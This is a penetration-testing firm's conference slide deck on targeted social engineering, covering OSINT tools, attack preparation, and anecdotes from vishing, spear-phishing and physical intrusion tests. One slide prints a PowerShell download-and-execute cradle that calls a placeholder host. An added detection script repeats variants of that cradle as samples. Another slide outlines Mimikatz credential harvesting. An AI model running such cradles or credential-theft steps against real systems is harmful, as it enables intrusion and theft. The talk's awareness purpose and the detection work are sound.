SOCIAL IMAGINEERING: Crafting Targeted Social Engineering Attacks

SLIDE 1

LEAP SECURITY

  • Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour.
  • Confidential. Not to be copied, distributed or reproduced without prior written approval.

@LeapSecurity leapsecurity.io

SOCIAL IMAGINEERING

Crafting Targeted Social Engineering Attacks

SLIDE 2

@LeapSecurity leapsecurity.io @jonathanbroche

Experience

  • Founder of Leap Security Inc.
  • Security Consultant/Penetration Tester
  • Forensic Analyst

Publications

  • Featured on security magazines
  • Hackin9, Pentest Magazine, ACAMS

Speaker

  • Conferences across the nation

Tools

  • InSpy, Pastepwnd, CredCrack

SLIDE 3


Social Engineering

SLIDE 4


Definition

  • The act of manipulating an individual(s) to obtain X
  • X is an object or information

SLIDE 5


What’s changed?

  • Education
  • Awareness (sorta)
  • It’s gotten easier for the bad guys too.
  • Don’t speak English? No problem.
      • Services to proofread and spell check malicious phishing emails
  • Not tech savvy? No problem.
      • Exploit and Ransomware Kits being sold for $500

SLIDE 6


Attack Methodology

Information Gathering → Attack Preparation → Exploitation

SLIDE 7


Attack Methodology (Cont.)

  • Information Gathering
      • Google, Bing, Shodan
      • Social Media – LinkedIn/Twitter/Facebook
      • Metadata
      • Surveillance (Physical Intel)

SLIDE 8


Attack Methodology (Cont.)

  • OSINT Favorites
      • HaveIBeenPwned: https://haveibeenpwned.com/
      • OSINT Framework: https://osintframework.com/
      • Intel Tools: https://inteltechniques.com/
      • Dragnet: https://github.com/tevora-threat/Dragnet

SLIDE 9


Pastepwnd Demo

https://github.com/leapsecurity/Pastepwnd

SLIDE 10


Attack Methodology (Cont.)

  • Attack Preparation
      • Get to know your target
      • Pick a persona to impersonate
      • Obtain target email signature
      • Build, Buy, or Prepare Tools
      • Spoof Services
      • Circumvent defensive technologies
      • Entice users with rewards

SLIDE 11

SLIDE 12


InSpy Demo

https://github.com/leapsecurity/InSpy

SLIDE 13


Attack Methodology (Cont.)

  • Exploitation
      • Slow and steady
      • Lateral movement
      • Sensitive data or objective
      • Exfiltration

SLIDE 14


Common Exploit Techniques

  • HTA – HTML Applications can be embedded on a website
  • Macros
  • Executables

SLIDE 15


Common Exploit Techniques (Cont.)

  • PowerShell
      • IEX (New-Object Net.WebClient).DownloadString('http://badhost/hackerscript.ps1')
  • C#
  • Visual Basic
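
A detection-side sketch for the download cradle above, added here as an example and not part of the original slides: it scans script-block text (as recorded by PowerShell script block logging, event ID 4104) for blocks that both fetch a remote string with Net.WebClient and hand it to IEX/Invoke-Expression. The sample blocks are constructed, and every host other than the slide's badhost is a placeholder.

```python
import re

# Constructed script-block text, shaped like the ScriptBlockText field of
# PowerShell script block logging (event ID 4104). Hosts are placeholders.
SAMPLE_BLOCKS = [
    "IEX (New-Object Net.WebClient).DownloadString('http://badhost/hackerscript.ps1')",
    "Get-ChildItem C:\\Users | Sort-Object Length",
    '$c = New-Object System.Net.WebClient; Invoke-Expression $c.downloadstring("http://badhost/a.ps1")',
    "IE`X (new-object net.webclient).DownloadString('http://badhost/b.ps1')",
    "(New-Object Net.WebClient).DownloadFile('http://updates.example/setup.msi', 'C:\\Temp\\setup.msi')",
]

# Execution half of the cradle: IEX or Invoke-Expression as a whole token.
EXEC = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I)
# Fetch half: a WebClient object whose DownloadString method is called.
FETCH = re.compile(r"net\.webclient.*?\.downloadstring\s*\(", re.I | re.S)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def normalize(text):
    """Remove backticks, which PowerShell ignores before ordinary characters."""
    return text.replace("`", "")


def find_cradle(block):
    """Return the literal URLs in a block that downloads a string and executes it."""
    text = normalize(block)
    if EXEC.search(text) and FETCH.search(text):
        return URL.findall(text) or ["<no literal url>"]
    return []


def scan(blocks):
    """Map block index -> URLs for every block matching the cradle pattern."""
    hits = {}
    for i, block in enumerate(blocks):
        urls = find_cradle(block)
        if urls:
            hits[i] = urls
    return hits


if __name__ == "__main__":
    for idx, urls in scan(SAMPLE_BLOCKS).items():
        print(f"block {idx}: download-and-execute cradle, source {urls}")
```

Requiring both halves keeps a plain DownloadFile call or a local Invoke-Expression from alerting on its own; each can still be scored separately at lower severity.
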
SLIDE 16


PS DownloadString functionality example

  • Logged into workstations via SMB
  • Use PowerShell script in memory to capture cleartext credentials using Mimikatz (Wdigest)
  • Until it found a domain administrator account

SLIDE 17


Example: Vishing

  • Targeted Customer Service Representatives within the Bank
  • Impersonated contractor working with help desk
  • Obtained help desk extension
  • Discovered MobileIron
  • Called Help Desk and obtained AD account

SLIDE 18


Example: Spear Phishing

  • Custom website (HTML, CSS, JS, PHP)
  • Rebrand scenario
SLIDE 19


Example: Physical Test

  • Cold brrr, no snow brush
  • Responder, cracked NTLM hashes
  • Became friends with security guard
  • Became best friends with employee and got a tour of the facility

SLIDE 20


Closing and Questions

SLIDE 21

LEAP SECURITY

  • Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour.
  • Confidential. Not to be copied, distributed or reproduced without prior written approval.

Thank you!!!
